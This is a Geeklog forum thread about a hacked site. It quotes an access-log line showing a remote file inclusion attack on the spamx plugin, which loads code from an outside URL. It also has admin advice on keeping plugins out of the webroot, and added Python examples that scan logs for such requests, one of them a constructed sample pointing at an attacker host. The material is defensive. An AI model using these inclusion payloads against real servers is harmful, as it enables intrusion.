
Geeklog Forums

Security Flaw in 1.4.1 or did I not upgrade correctly?


Lex

Anonymous
After my site was hacked up I upgraded to 1.4.1 last night.

My ISP contacted me this morning saying there are still successful hacks. From my ISP...

Here is the log entry I mentioned on the phone. This looks like the most recent successful hack:

79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET /plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631 www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "-"

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Do you have a file /plugins/spamx/Mass.php? You shouldn't. And that directory shouldn't be in your webroot or at least should be password-protected.

FWIW, we have hundreds of these hacking attempts every day, but if you have your plugins directory outside of the webroot or password-protect it, they won't do anything.

"Mass.php" is not part of Geeklog, so if you have such a file, it may be a leftover from the hack. In which case you should remove it ASAP.

Also see this thread for someone with a similar problem.

bye, Dirk
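The log line Lex's ISP quoted shows the pattern Dirk describes: a request into the plugins directory with a query parameter (_CONF[path]) carrying a remote URL, answered with HTTP 200. The following is an added example, not code from this thread or from Geeklog, that parses Apache combined-format lines and sorts them into "ignore", "blocked" and "needs-review" so an admin can tell attempts that were stopped from ones that reached a script. The first sample line is the one from the thread; the other two are constructed, and the NON_PUBLIC_DIRS list is an assumption to extend for your own layout.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined log format followed by the trailing vhost field seen in the
# ISP excerpt above (regex written for this example, prefix match only).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Directories that should not be reachable through the web server at all.
# Only "plugins" comes from the thread; extend to your install (assumption).
NON_PUBLIC_DIRS = ("/plugins/",)

# Constructed sample log: line 1 is the entry quoted in the thread, lines 2-3 are made up.
SAMPLE_LOG = [
    '79.114.68.8 - - [12/Dec/2007:11:19:08 -0500] "GET /plugins/spamx/Mass.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.estudiosmultimedia.com/images/jejek.txt? HTTP/1.1" 200 631 www.club80s.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "-"',
    '203.0.113.7 - - [12/Dec/2007:11:20:00 -0500] "GET /index.php?topic=general HTTP/1.1" 200 4521 www.example.com "-" "Mozilla/5.0" "-"',
    '198.51.100.9 - - [12/Dec/2007:11:21:30 -0500] "GET /plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://attacker.invalid/x.txt? HTTP/1.1" 403 212 www.example.com "-" "Mozilla/4.0" "-"',
]


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def remote_url_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if REMOTE_URL.match(v)]


def classify(line):
    """Classify a line as 'ignore', 'blocked' or 'needs-review'.

    A request is suspicious when a query parameter carries a remote URL (the
    _CONF[path]= pattern in the thread) or the path enters a non-public
    directory. A 2xx answer means a script ran and the host needs review;
    anything else means the request was stopped before that.
    """
    rec = parse_line(line)
    if rec is None:
        return "ignore"
    path = urlsplit(rec["target"]).path
    suspicious = bool(remote_url_params(rec["target"])) or any(
        d in path for d in NON_PUBLIC_DIRS
    )
    if not suspicious:
        return "ignore"
    if 200 <= rec["status"] < 300:
        return "needs-review"
    return "blocked"


def scan(lines):
    """Count lines per classification; 'needs-review' > 0 is the alarm condition."""
    counts = {"ignore": 0, "blocked": 0, "needs-review": 0}
    for line in lines:
        counts[classify(line)] += 1
    return counts


if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line), line[:60])
    print(scan(SAMPLE_LOG))
```

Run it over a real access log with `scan(open("access_log"))`; the 200-status "needs-review" hits are the ones to chase down, while a steady stream of "blocked" lines is what Dirk's "hundreds of these attempts every day" looks like once the plugins directory is no longer served.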

Lex

Anonymous
I was unaware that the plugins directory was supposed to be outside the webroot. I've been running it for years inside. Is that a common mistake that other people make or am I the only one?

jmucchiello

Forum User
Full Member
Registered: 08/29/05
Posts: 985
Only public_html is supposed to be inside the webroot.

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location: Stuttgart, Germany
Quote by: Lex

I was unaware that the plugins directory was supposed to be outside the webroot.


That has always been our recommendation. Unfortunately, popular autoinstallers like Fantastico have been doing it wrong from day 1 without our knowledge.

bye, Dirk
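jmucchiello's rule (only public_html under the webroot) and Dirk's note that autoinstallers got this wrong can be checked with a path comparison. The following is an added example, not from the thread or from Geeklog, that reports which top-level install directories sit inside the DocumentRoot. It uses os.path.commonpath rather than a string prefix test so that a sibling such as public_html2 is not mistaken for public_html; INSTALL_DIRS lists only the two directories named in the thread and is an assumption to extend. It compares normalised path strings and does not resolve symlinks.

```python
import os

# Top-level directories of a Geeklog install. "public_html" and "plugins" are
# named in the thread; add the rest of your own layout here (assumption).
INSTALL_DIRS = ("public_html", "plugins")


def is_inside(path, root):
    """True if path equals root or lies below it (normalised strings, no symlink resolution)."""
    path, root = os.path.abspath(path), os.path.abspath(root)
    return os.path.commonpath([path, root]) == root


def web_reachable_dirs(install_root, document_root, dirs=INSTALL_DIRS):
    """Install directories the web server can serve because they sit under DocumentRoot."""
    return [d for d in dirs if is_inside(os.path.join(install_root, d), document_root)]


def layout_problems(install_root, document_root, public_dir="public_html"):
    """Everything web-reachable except public_dir is a misplacement to fix."""
    return [d for d in web_reachable_dirs(install_root, document_root) if d != public_dir]


if __name__ == "__main__":
    # Recommended layout: DocumentRoot points at public_html inside the install.
    print(layout_problems("/home/lex/geeklog", "/home/lex/geeklog/public_html"))
    # Autoinstaller-style layout: whole install dropped into the DocumentRoot.
    print(layout_problems("/home/lex/www", "/home/lex/www"))
```

Feed it the install path and the DocumentRoot from your vhost configuration; a non-empty result means those directories must be moved outside the webroot or, failing that, password-protected as Dirk suggests.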
